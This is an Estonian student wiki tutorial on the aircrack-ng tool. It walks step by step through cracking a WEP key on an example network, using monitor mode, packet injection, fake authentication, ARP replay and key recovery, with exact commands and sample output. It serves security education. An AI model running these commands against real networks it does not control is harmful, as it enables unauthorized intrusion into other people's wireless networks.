Aircrack
Sissejuhatus
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.
Eeldused
- Elementaarne käsurea kasutamisoskus
- Teadmised WiFi, WEP, WPA/WPA2 kohta
- Võrgus vähemalt 1 aktiivne klient
- Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
- Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
- aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: siit ja siit)
WiFi adapteri vaatamine[1]:
lspci -nn | grep Network
või rohkema informatsiooni saamiseks[2]:
lshw -class network
Tulemuseks saame midagi sarnast:
02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)
või
*-network description: Wireless interface product: Centrino Advanced-N 6205 [Taylor Peak] vendor: Intel Corporation physical id: 0 bus info: pci@0000:02:00.0 logical name: wlan0 version: 34 serial: 6c:88:14:1d:29:c4 width: 64 bits clock: 33MHz capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn resources: irq:32 memory:f7d00000-f7d01fff
Üldkirjeldus
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm[3]. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu[4]:
- airodump-ng - programm pakettide püüdmiseks
- aireplay-ng - programm pakettide „süstimiseks“
- aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
- airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks
Süntaks
aircrack-ng süntaks näeb välja järgmine[5]:
aircrack-ng [võti] <püütud fail(id)>
Nimekirja võtmetele leiab SIIT!
Installeerimine
Uuendame repositooriumi:
sudo apt-get update
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt[6]:
sudo apt-get install aircrack-ng
WEP võtme murdmine
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja[7]:
- Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
- BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
- ESSID (võrgu nimi): teddy
- Pääsupunkti kanal: 9
- Raadiovõrgu liides (ingl. k Wireless interface): ath0
Eesmärk
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks[8].
Lühikesed tegevussammud
Lühidalt sammudest, mida tegema asume[9]:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)
2. Testime „süstimise“ suutlikkust pääsupunktile
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid
Näide WEP võtme lahti murdmise protsessist
Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi[10]
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.
Peata ath0 liides:
airmon-ng stop ath0
Tulemus:
Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Kontrolli, kas kõik athX liidesed on ikka suletud:
iwconfig
Tulemus:
lo no wireless extensions. eth0 no wireless extensions. wifi0 no wireless extensions.
Märge: Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval airmon-ng stop athX käsuga sulgeda.
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
airmon-ng start wifi0 9
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.
Tulemus:
Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.
Veendumaks, et liides on korrektselt üles seatud:
iwconfig
Tulemus:
lo no wireless extensions. wifi0 no wireless extensions. eth0 no wireless extensions. ath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
Samm 2: Testime „süstimise“ suutlikkust pääsupunktile[11]
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.
Sisesta käsureale:
aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0
Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides
Tulemus:
09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9 09:23:35 Trying broadcast probe requests... 09:23:35 Injection is working! 09:23:37 Found 1 AP 09:23:37 Trying directed probe requests... 09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy' 09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73 09:23:39 30/30: 100%
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
Samm 3: Avada airodump-ng pakettide püüdmiseks[12]
Ava uus konsooliaken ja sisesta:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy BSSID STATION PWR Lost Packets Probes 00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga[13]
Ava uus konsooliaken ja sisesta:
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress
Õnnestumise korral on tulemus:
18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request 18:28:02 Authentication successful 18:28:02 Sending Association Request 18:28:02 Association successful :-) 18:28:02 Got a deauthentication packet! 18:28:05 Sending Authentication Request 18:28:05 Authentication successful 18:28:05 Sending Association Request 18:28:10 Sending Authentication Request 18:28:10 Authentication successful 18:28:10 Sending Association Request
Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis[14]
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.
Ava uus konsooliaken ja sisesta:
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Tulemus:
Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
Samm 6: Ava aircrack-ng salasõna lahti murdmiseks[15]
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.
Ava uus konsooliaken:
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”
Tulemus:
[00:03:06] Tested 674449 keys (got 96610 IVs) KB depth byte(vote) 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0) 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12) 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10) 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%
Kokkuvõte
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.
Kasutatud kirjandus
- ↑ PCI
- ↑ HowTo: Linux Show List Of Network Cards
- ↑ Description
- ↑ Aircrack-ng (WEP, WPA-PSK Crack)
- ↑ Usage
- ↑ Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]
- ↑ Equipment used
- ↑ Solution Overview
- ↑ Solution Overview - the basic steps
- ↑ Step 1 - Start the wireless interface in monitor mode on AP channel
- ↑ Step 2 - Test Wireless Device Packet Injection
- ↑ Step 3 - Start airodump-ng to capture the IVs
- ↑ Step 4 - Use aireplay-ng to do a fake authentication with the access point
- ↑ Step 5 - Start aireplay-ng in ARP request replay mode
- ↑ Step 6 - Run aircrack-ng to obtain the WEP key
Autor
Kelly Tragel [ISa 21]
Viimati muudetud: 25.05.2015
Versioonide ajalugu
Kuupäev | Versioon |
---|---|
25.05.2015 | 1.0 |